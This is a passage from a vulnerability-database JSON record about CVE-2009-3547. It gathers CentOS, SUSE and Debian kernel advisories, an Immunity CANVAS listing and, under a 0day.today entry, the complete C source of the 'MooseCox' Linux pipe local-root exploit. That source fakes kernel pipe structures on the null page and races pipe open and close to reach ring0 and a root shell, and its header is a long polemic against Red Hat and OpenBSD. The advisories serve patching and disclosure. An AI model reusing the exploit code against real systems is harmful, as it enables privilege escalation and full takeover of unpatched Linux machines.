boot. (BZ#524153)\n\n* a caching bug in nfs_readdir() may have caused NFS clients to see\nduplicate files or not see all files in a directory. (BZ#526960)\n\n* the RHSA-2009:1243 update removed the mpt_msi_enable option, preventing\ncertain scripts from running. This update adds the option back. (BZ#526963)\n\n* an iptables rule with the recent module and a hit count value greater\nthan the ip_pkt_list_tot parameter (the default is 20), did not have any\neffect over packets, as the hit count could not be reached. (BZ#527434)\n\n* a check has been added to the IPv4 code to make sure that rt is not NULL,\nto help prevent future bugs in functions that call ip_append_data() from\nbeing exploitable. (BZ#527436)\n\n* a kernel panic occurred in certain conditions after reconfiguring a tape\ndrive's block size. (BZ#528133)\n\n* when using the Linux Virtual Server (LVS) in a master and backup\nconfiguration, and propagating active connections on the master to the\nbackup, the connection timeout value on the backup was hard-coded to 180\nseconds, meaning connection information on the backup was soon lost. This\ncould prevent the successful failover of connections. The timeout value\ncan now be set via \"ipvsadm --set\". (BZ#528645)\n\n* a bug in nfs4_do_open_expired() could have caused the reclaimer thread on\nan NFSv4 client to enter an infinite loop. (BZ#529162)\n\n* MSI interrupts may not have been delivered for r8169 based network cards\nthat have MSI interrupts enabled. This bug only affected certain systems.\n(BZ#529366)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016304.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016305.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1548.html", "modified": "2009-11-04T19:57:17", "published": "2009-11-04T19:57:14", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/016304.html", "id": "CESA-2009:1548", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:33:47", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:1550\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* when fput() was called to close a socket, the __scm_destroy() function in\nthe Linux kernel could make indirect recursive calls to itself. This could,\npotentially, lead to a denial of service issue. (CVE-2008-5029, Important)\n\n* the sendmsg() function in the Linux kernel did not block during UNIX\nsocket garbage collection. This could, potentially, lead to a local denial\nof service. (CVE-2008-5300, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* a flaw was found in the Intel PRO/1000 network driver in the Linux\nkernel. Frames with sizes near the MTU of an interface may be split across\nmultiple hardware receive descriptors. Receipt of such a frame could leak\nthrough a validation check, leading to a corruption of the length check. A\nremote attacker could use this flaw to send a specially-crafted packet that\nwould cause a denial of service or code execution. (CVE-2009-1385,\nImportant)\n\n* the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags were not cleared when a\nsetuid or setgid program was executed. A local, unprivileged user could use\nthis flaw to bypass the mmap_min_addr protection mechanism and perform a\nNULL pointer dereference attack, or bypass the Address Space Layout\nRandomization (ASLR) security feature. (CVE-2009-1895, Important)\n\n* it was discovered that, when executing a new process, the clear_child_tid\npointer in the Linux kernel is not cleared. If this pointer points to a\nwritable portion of the memory of the new program, the kernel could corrupt\nfour bytes of memory, possibly leading to a local denial of service or\nprivilege escalation. (CVE-2009-2848, Important)\n\n* missing initialization flaws were found in getname() implementations in\nthe IrDA sockets, AppleTalk DDP protocol, NET/ROM protocol, and ROSE\nprotocol implementations in the Linux kernel. Certain data structures in\nthese getname() implementations were not initialized properly before being\ncopied to user-space. These flaws could lead to an information leak.\n(CVE-2009-3002, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nBug fixes:\n\n* this update adds the mmap_min_addr tunable and restriction checks to help\nprevent unprivileged users from creating new memory mappings below the\nminimum address. This can help prevent the exploitation of NULL pointer\ndereference bugs. Note that mmap_min_addr is set to zero (disabled) by\ndefault for backwards compatibility. (BZ#512642)\n\n* a bridge reference count problem in IPv6 has been fixed. (BZ#457010)\n\n* enforce null-termination of user-supplied arguments to setsockopt().\n(BZ#505514)\n\n* the gcc flag \"-fno-delete-null-pointer-checks\" was added to the kernel\nbuild options. This prevents gcc from optimizing out NULL pointer checks\nafter the first use of a pointer. NULL pointer bugs are often exploited by\nattackers. Keeping these checks is a safety measure. (BZ#511185)\n\n* a check has been added to the IPv4 code to make sure that rt is not NULL,\nto help prevent future bugs in functions that call ip_append_data() from\nbeing exploitable. (BZ#520300)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016300.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016301.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-doc\nkernel-hugemem\nkernel-hugemem-unsupported\nkernel-smp\nkernel-smp-unsupported\nkernel-source\nkernel-unsupported\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1550.html", "modified": "2009-11-04T00:56:16", "published": "2009-11-04T00:55:32", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/016300.html", "id": "CESA-2009:1550", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-04-09T09:53:09", "bulletinFamily": "exploit", "description": "Linux kernel versions 2.6.10 up to but not including 2.6.31.5 pipe.c privilege escalation exploit.", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26409", "id": "1337DAY-ID-26409", "type": "zdt", "title": "Linux Kernel 2.6.x pipe.c Privilege Escalation Exploit", "sourceData": "/* exp_moosecox.c\r\n Watch a video of the exploit here:\r\n http://www.youtube.com/watch?v=jt81NvaOj5Y\r\n \r\n developed entirely by Ingo Molnar (exploit writer extraordinaire!) , \r\n thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)\r\n \r\n dedicated to the Red Hat employees who get paid to copy+paste my \r\n twitter and issue security advisories, their sweet \r\n acknowledgement policy, and general classiness\r\n see: https://bugzilla.redhat.com/show_activity.cgi?id=530490\r\n \r\n \"policy\" aside, there's a word for what you guys are doing: \"plagiarism\"\r\n in fact, i tested this one day by posting three links to twitter,\r\n without any discussion on any of them. the same day, those three\r\n (and only those three) links were assigned CVEs, even though two of \r\n them weren't even security bugs (it doesn't pay to copy+paste)\r\n \r\n official Ingo Molnar (that's me) policy for acknowledgement in \r\n exploits requires general douche-ness or plagiarization\r\n official policy further dictates immediate exploit release for\r\n embargoed, patched bug\r\n \r\n I'll be curious to see what the CVE statistics are like for the \r\n kernel this year when they get compiled next year -- I'm predicting \r\n that when someone's watching the sleepy watchers, a more personal \r\n interest is taken in doing the job that you're paid to do correctly.\r\n \r\n --------------------------------------------------------------------\r\n \r\n Special PS note to Theo (I can do this here because I know he'll \r\n never read it -- the guy is apparently oblivious to the entire world of \r\n security around him -- the same world that invents the protections \r\n years before him that he pats himself on the back for \"innovating\")\r\n Seriously though, it's incredible to me that an entire team \r\n of developers whose sole purpose is to develop a secure operating \r\n system can be so oblivious to the rest of the world. They haven't \r\n innovated since they replaced exploitable string copies with \r\n exploitable string truncations 6 or so years ago.\r\n \r\n The entire joke of a thread can be read here:\r\n http://www.pubbs.net/openbsd/200911/4582/\r\n \"Our focus therefore is always on finding innovative ideas which make \r\n bugs very hard to exploit succesfully.\"\r\n \"He's too busy watching monkey porn instead of\r\n building researching last-year's security technology that will stop \r\n an exploit technique that has been exploited multiple times.\"\r\n \"it seems that everyone else is slowly coming around to the\r\n same solution.\"\r\n \r\n So let's talk about this \"innovation\" of theirs with their \r\n implementation of mmap_min_addr:\r\n \r\n They implemented it in 2008, a year after Linux implemented it, a \r\n year after the public phrack article on the bug class, more than a \r\n year after my mail to dailydave with the first public Linux kernel \r\n exploit for the bug class, and over two years after UDEREF was \r\n implemented in PaX (providing complete protection against the smaller \r\n subset of null ptr dereference bugs and the larger class of invalid \r\n userland access in general).\r\n \r\n OpenBSD had a public null pointer dereference exploit (agp_ioctl()) \r\n published for its OS in January of 2007. It took them over a year \r\n and a half to implement the same feature that was implemented in \r\n Linux a few months after my public exploit in 2007.\r\n \r\n So how can it be that \"everyone else is slowly coming around to the \r\n same solution\" when \"everyone else\" came to that solution over a \r\n year before you Theo? In fact, I prediced this exact situation would \r\n happen back in 2007 in my DD post:\r\n http://lists.virus.org/dailydave-0703/msg00011.html\r\n \"Expect OpenBSD to independently invent a protection against null ptr \r\n deref bugs sometime in 2009.\"\r\n \r\n Let's talk about some more \"innovation\" -- position independent \r\n executables. PaX implemented position independent executables on \r\n Linux back in 2001 (ET_DYN). PIE binary support was added to GNU \r\n binutils in 2003. Those OpenBSD innovators implemented PIE binaries \r\n in 2008, 7 years after PaX. Innovation indeed!\r\n \r\n How about their W^X/ASLR innovation? These plagiarists have the \r\n audacity to announce on their press page:\r\n http://www.openbsd.org/press.html\r\n \"Microsoft borrows one of OpenBSD's security features for Vista, \r\n stack/library randomization, under the name Address Space Layout \r\n Randomization (ASLR). \"Until now, the feature has been most \r\n prominently used in the OpenBSD Unix variant and the PaX and Exec \r\n Shield security patches for Linux\"\"\r\n Borrowing one of your features? Where'd this ASLR acronym come from \r\n anyway? Oh that's right, PaX again -- when they published the first \r\n design and implementation of it, and coined the term, in July 2001.\r\n It covered the heap, mmap, and stack areas.\r\n OpenBSD implemented \"stack-gap randomization\" in 2003. Way to \r\n innovate!\r\n \r\n W^X, which is a horrible name as OpenBSD doesn't even enforce it with \r\n mprotect restrictions like PaX did from the beginning or even SELinux \r\n is doing now (from a 3rd party contribution modeled after PaX): \r\n PaX implemented true per-page non-executable page support, protecting \r\n binary data, the heap, and the stack, back in 2000.\r\n OpenBSD implemented it in 2003, requiring a full userland rebuild.\r\n The innovation is overwhelming!\r\n \r\n They keep coming up with the same exact \"innovations\" others came up \r\n with years before them. Their official explanation for where they \r\n got the W^X/ASLR ideas was a drunk guy came into their tent at one of \r\n their hack-a-thons and started talking about the idea. They had \r\n never heard of PaX when we asked them in 2003. Which makes the \r\n following involuntarily contributed private ICB logs from Phrack #66\r\n (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:\r\n \r\n On some sunny day in July 2002 (t: Theo de Raadt):\r\n <cloder> why can't you just randomize the base\r\n <cloder> that's what PaX does\r\n <t> You've not been paying attention to what art's saying, or you don't \r\n understand yet, either case is one of think it through yourself.\r\n <cloder> whatever\r\n \r\n Only to see poetic justice in August 2003 (ttt: Theo again):\r\n \r\n <miod> more exactly, we heard of pax when they started bitching\r\n <ttt> miod, that was very well spoken.\r\n \r\n That wraps up our OpenBSD history lesson, in case anyone forgot it.\r\n PS -- enjoy that null ptr deref exploit just released for OpenBSD.\r\n \r\n --------------------------------------------------------------------\r\n \r\n Important final exploit notes:\r\n \r\n don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,\r\n or DEBUG_SPINLOCK are enabled and modify the structures below \r\n accordingly -- a fancier exploit would do this automatically\r\n \r\n I've broken the 2.4->2.6.10 version of the exploit and would like to see \r\n someone fix it ;) See below for more comments on this.\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <sys/syscall.h>\r\n#include <sys/utsname.h>\r\n#include \"exp_framework.h\"\r\n \r\nint pipefd[2];\r\nstruct exploit_state *exp_state;\r\nint is_old_kernel = 0;\r\n \r\nint go_go_speed_racer(void *unused)\r\n{\r\n int ret;\r\n \r\n while(!exp_state->got_ring0) {\r\n /* bust spinlock */\r\n *(unsigned int *)NULL = is_old_kernel ? 0 : 1;\r\n ret = pipe(pipefd);\r\n if (!ret) {\r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n }\r\n }\r\n \r\n return 0;\r\n}\r\n \r\n/* <3 twiz/sgrakkyu */\r\nint start_thread(int (*f)(void *), void *arg)\r\n{\r\n char *stack = malloc(0x4000);\r\n int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);\r\n if (tid < 0) {\r\n printf(\"can't create thread\\n\");\r\n exit(1);\r\n }\r\n sleep(1);\r\n return tid;\r\n}\r\n \r\nchar *desc = \"MooseCox: Linux <= 2.6.31.5 pipe local root\";\r\nchar *cve = \"CVE-2009-3547\";\r\n \r\n#define PIPE_BUFFERS 16\r\n \r\n/* this changes on older kernels, but it doesn't matter to our method */\r\nstruct pipe_buf_operations {\r\n int can_merge;\r\n void *map;\r\n void *unmap;\r\n void *confirm;\r\n void *release;\r\n void *steal;\r\n void *get;\r\n};\r\n \r\nstruct pipe_buffer2620ornewer {\r\n void *page;\r\n unsigned int offset, len;\r\n void *ops;\r\n unsigned int flags;\r\n unsigned long private;\r\n};\r\n \r\nstruct pipe_buffer2619orolder {\r\n void *page;\r\n unsigned int offset, len;\r\n void *ops;\r\n unsigned int flags;\r\n};\r\n \r\nstruct pipe_buffer2616orolder {\r\n void *page;\r\n unsigned int offset, len;\r\n void *ops;\r\n};\r\n \r\nstruct pipe_inode_info2620ornewer {\r\n unsigned int spinlock;\r\n /*\r\n // LOCKBREAK\r\n unsigned int break_lock;\r\n // DEBUG_SPINLOCK\r\n unsigned int magic, owner_cpu;\r\n void *owner;\r\n */\r\n void *next, *prev;\r\n unsigned int nrbufs, curbuf;\r\n void *tmp_page;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n void *fasync_readers;\r\n void *fasync_writers;\r\n void *inode;\r\n struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];\r\n};\r\n \r\nstruct pipe_inode_info2619orolder {\r\n unsigned int spinlock;\r\n /*\r\n // if PREEMPT enabled\r\n unsigned int break_lock;\r\n // DEBUG_SPINLOCK\r\n unsigned int magic, owner_cpu;\r\n void *owner;\r\n */\r\n void *next, *prev;\r\n unsigned int nrbufs, curbuf;\r\n struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n void *fasync_readers;\r\n void *fasync_writers;\r\n void *inode;\r\n};\r\n \r\nstruct pipe_inode_info2616orolder {\r\n unsigned int spinlock;\r\n /*\r\n // if PREEMPT enabled\r\n unsigned int break_lock;\r\n // DEBUG_SPINLOCK\r\n unsigned int magic, owner_cpu;\r\n */\r\n void *owner;\r\n void *next, *prev;\r\n unsigned int nrbufs, curbuf;\r\n struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n void *fasync_readers;\r\n void *fasync_writers;\r\n};\r\n \r\nstruct fasync_struct {\r\n int magic;\r\n int fa_fd;\r\n struct fasync_struct *fa_next;\r\n void *file;\r\n};\r\n \r\nstruct pipe_inode_info2610orolder {\r\n /* this includes 2.4 kernels */\r\n unsigned long lock; // can be rw or spin\r\n void *next, *prev;\r\n char *base;\r\n unsigned int len;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n /* 2.4 only */\r\n unsigned int waiting_readers;\r\n \r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n /* 2.6 only */\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n};\r\n \r\nint prepare(unsigned char *buf)\r\n{ \r\n struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;\r\n struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;\r\n struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;\r\n struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;\r\n struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;\r\n int i;\r\n int newver;\r\n struct utsname unm;\r\n \r\n i = uname(&unm);\r\n if (i != 0) {\r\n printf(\"unable to get kernel version\\n\");\r\n exit(1);\r\n }\r\n \r\n if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {\r\n fprintf(stdout, \" [+] Using newer pipe_inode_info layout\\n\");\r\n newver = 3;\r\n } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {\r\n fprintf(stdout, \" [+] Using older pipe_inode_info layout\\n\");\r\n newver = 2;\r\n } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {\r\n fprintf(stdout, \" [+] Using older-er pipe_inode_info layout\\n\");\r\n newver = 1;\r\n// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {\r\n// is_old_kernel = 1;\r\n// newver = 0;\r\n } else {\r\n fprintf(stdout, \" [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\\n\");\r\n exit(1);\r\n }\r\n \r\n /* for most of these what will happen is our write will\r\n cause ops->confirm(/pin) to be called, which we've replaced\r\n with own_the_kernel\r\n for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets\r\n called instead (repeatedly) is the release op\r\n */\r\n if (newver == 3) {\r\n /* uncomment for DEBUG_SPINLOCK */\r\n //info_new->magic = 0xdead4ead;\r\n /* makes list_head empty for wake_up_common */\r\n info_new->next = &info_new->next;\r\n info_new->readers = 1;\r\n info_new->writers = 1;\r\n info_new->nrbufs = 1;\r\n info_new->curbuf = 1;\r\n for (i = 0; i < PIPE_BUFFERS; i++)\r\n info_new->bufs[i].ops = (void *)ops;\r\n } else if (newver == 2) {\r\n /* uncomment for DEBUG_SPINLOCK */\r\n //info_old->magic = 0xdead4ead;\r\n /* makes list_head empty for wake_up_common */\r\n info_old->next = &info_old->next;\r\n info_old->readers = 1;\r\n info_old->writers = 1;\r\n info_old->nrbufs = 1;\r\n info_old->curbuf = 1;\r\n for (i = 0; i < PIPE_BUFFERS; i++)\r\n info_old->bufs[i].ops = (void *)ops;\r\n } else if (newver == 1) {\r\n /* uncomment for DEBUG_SPINLOCK */\r\n //info_older->magic = 0xdead4ead;\r\n /* makes list_head empty for wake_up_common */\r\n info_older->next = &info_older->next;\r\n info_older->readers = 1;\r\n info_older->writers = 1;\r\n info_older->nrbufs = 1;\r\n info_older->curbuf = 1;\r\n /* we'll get called multiple times from free_pipe_info\r\n but it's ok because own_the_kernel handles this case\r\n */\r\n for (i = 0; i < PIPE_BUFFERS; i++)\r\n info_older->bufs[i].ops = (void *)ops;\r\n } else {\r\n /*\r\n different ballgame here, instead of being able to \r\n provide a function pointer in the ops table, you \r\n control a base address used to compute the address for \r\n a copy into the kernel via copy_from_user. The \r\n following should get you started.\r\n */\r\n /* lookup symbol for writable fptr then trigger it later\r\n change the main write in the one thread to write out \r\n pointers with the value of exp_state->exploit_kernel\r\n */\r\n info_oldest->base = (char *)0xc8000000;\r\n info_oldest->readers = 1;\r\n info_oldest->writers = 1;\r\n return 0;\r\n }\r\n \r\n ops->can_merge = 1;\r\n for (i = 0; i < 16; i++)\r\n ((void **)&ops->map)[i] = exp_state->own_the_kernel;\r\n \r\n return 0;\r\n}\r\n \r\nint requires_null_page = 1;\r\n \r\nint get_exploit_state_ptr(struct exploit_state *ptr)\r\n{\r\n exp_state = ptr;\r\n return 0;\r\n}\r\n \r\nint trigger(void)\r\n{\r\n char buf[128];\r\n int fd;\r\n int i = 0;\r\n \r\n /* ignore sigpipe so we don't bail out early */\r\n signal(SIGPIPE, SIG_IGN);\r\n \r\n start_thread(go_go_speed_racer, NULL);\r\n \r\n fprintf(stdout, \" [+] We'll let this go for a while if needed...\\n\");\r\n fflush(stdout);\r\n \r\n while (!exp_state->got_ring0 && i < 10000000) {\r\n fd = pipefd[1];\r\n sprintf(buf, \"/proc/self/fd/%d\", fd);\r\n fd = open(buf, O_WRONLY | O_NONBLOCK);\r\n if (fd >= 0) {\r\n /* bust spinlock */\r\n *(unsigned int *)NULL = is_old_kernel ? 0 : 1;\r\n write(fd, \".\", 1);\r\n close(fd);\r\n }\r\n i++;\r\n }\r\n \r\n if (!exp_state->got_ring0) {\r\n fprintf(stdout, \" [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\\n\");\r\n return 0;\r\n }\r\n \r\n return 1;\r\n}\r\n \r\nint post(void)\r\n{\r\n// return RUN_ROOTSHELL;\r\n return FUNNY_PIC_AND_ROOTSHELL;\r\n}\r\n\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/26409", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T19:48:30", "bulletinFamily": "exploit", "description": "**Name**| fs_pipe_race_to_null \n---|--- \n**CVE**| CVE-2009-3547 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| fs_pipe_race_to_null local root \n**Notes**| Repeatability: Infinite \nNOTES: \n \nTested on Ubuntu 9.04 32-bit, Ubuntu 9.10 32-bit, kernels 2.6.[28|29|30|31] \nVulnerable kernels &lt;= 2.6.31 32bit. \n \n \nVENDOR: Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0871 \nCVE Name: CVE-2009-3547 \n\n", "modified": "2013-02-18T04:41:00", "published": "2013-02-18T04:41:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/fs_pipe_race_to_null", "id": "FS_PIPE_RACE_TO_NULL", "title": "Immunity Canvas: FS_PIPE_RACE_TO_NULL", "type": "canvas", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:37:59", "bulletinFamily": "unix", "description": "This update fixes various bugs and some security issues in the SUSE Linux Enterprise 10 SP 3 kernel.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-11-12T19:03:35", "published": "2009-11-12T19:03:35", "id": "SUSE-SA:2009:055", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00006.html", "title": "local privilege escalation in kernel", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-04T12:28:11", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 11 and openSUSE 11.1 Kernel was updated to 2.6.27.39 fixing various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-12-02T17:15:31", "published": "2009-12-02T17:15:31", "id": "SUSE-SA:2009:060", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-12/msg00001.html", "title": "remote denial of service in kernel", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:17:56", "bulletinFamily": "unix", "description": "Several security issues and some bugs were fixed in the SUSE Linux Enterprise 9 kernel.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-11-16T13:03:36", "published": "2009-11-16T13:03:36", "id": "SUSE-SA:2009:056", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00007.html", "type": "suse", "title": "local privilege escalation in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:04", "bulletinFamily": "unix", "description": "This update fixes a several security issues and various bugs in the SUSE Linux Enterprise 10 SP 2 kernel.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-11-11T17:52:30", "published": "2009-11-11T17:52:30", "id": "SUSE-SA:2009:054", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00005.html", "type": "suse", "title": "local privilege escalation in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:20", "bulletinFamily": "unix", "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1927-1 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nNovember 5, 2009 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : privilege escalation/denial of service/sensitive memory leak\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-3228 CVE-2009-3238 CVE-2009-3547 CVE-2009-3612\n CVE-2009-3620 CVE-2009-3621 CVE-2009-3638\n\nNotice: Debian 5.0.4, the next point release of Debian &#x27;lenny&#x27;, will\ninclude a new default value for the mmap_min_addr tunable. This\nchange will add an additional safeguard against a class of security\nvulnerabilities known as &quot;NULL pointer dereference&quot; vulnerabilities,\nbut it will need to be overridden when using certain applications.\nAdditional information about this change, including instructions for\nmaking this change locally in advance of 5.0.4 (recommended), can be\nfound at:\n http://wiki.debian.org/mmap_min_addr\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, sensitive memory leak or privilege\nescalation. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-3228\n\n Eric Dumazet reported an instance of uninitialized kernel memory\n in the network packet scheduler. Local users may be able to\n exploit this issue to read the contents of sensitive kernel\n memory.\n \nCVE-2009-3238\n\n Linus Torvalds provided a change to the get_random_int() function\n to increase its randomness.\n\nCVE-2009-3547\n\n Earl Chew discovered a NULL pointer dereference issue in the\n pipe_rdwr_open function which can be used by local users to gain\n elevated privileges.\n\nCVE-2009-3612\n\n Jiri Pirko discovered a typo in the initialization of a structure\n in the netlink subsystem that may allow local users to gain access\n to sensitive kernel memory.\n\nCVE-2009-3620\n\n Ben Hutchings discovered an issue in the DRM manager for ATI Rage\n 128 graphics adapters. Local users may be able to exploit this\n vulnerability to cause a denial of service (NULL pointer\n dereference).\n\nCVE-2009-3621\n\n Tomoki Sekiyama discovered a deadlock condition in the UNIX domain\n socket implementation. Local users can exploit this vulnerability\n to cause a denial of service (system hang).\n\nCVE-2009-3638\n\n David Wagner reported an overflow in the KVM subsystem on i386\n systems. This issue is exploitable by local users with access to\n the /dev/kvm device file.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.26-19lenny2.\n\nFor the oldstable distribution (etch), these problems, where\napplicable, will be fixed in updates to linux-2.6 and linux-2.6.24.\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux\npackages.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or &quot;leap-frog&quot; fashion.\n\nThe following matrix lists additional source packages that were\nrebuilt for compatibility with or to take advantage of this update:\n\n Debian 5.0 (lenny)\n user-mode-linux 2.6.26-1um-2+19lenny2\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, armel, hppa, i386,\nia64, and powerpc. Updates for other architectures will be released\nas they become available.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.dsc\n Size/MD5 checksum: 5778 8ea6c47c6f227f855a41deea57d988d8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.diff.gz\n Size/MD5 checksum: 7651053 5cf749f9817436c544df97bc0217f125\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\n Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 106866 d25eeb65132ec68406d8fdf7ea340274\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 4627374 196ffe954d4e906638c7eb2bd22e310d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-19lenny2_all.deb\n Size/MD5 checksum: 2565284 0682418bd83f755a17a71435e535f91a\n 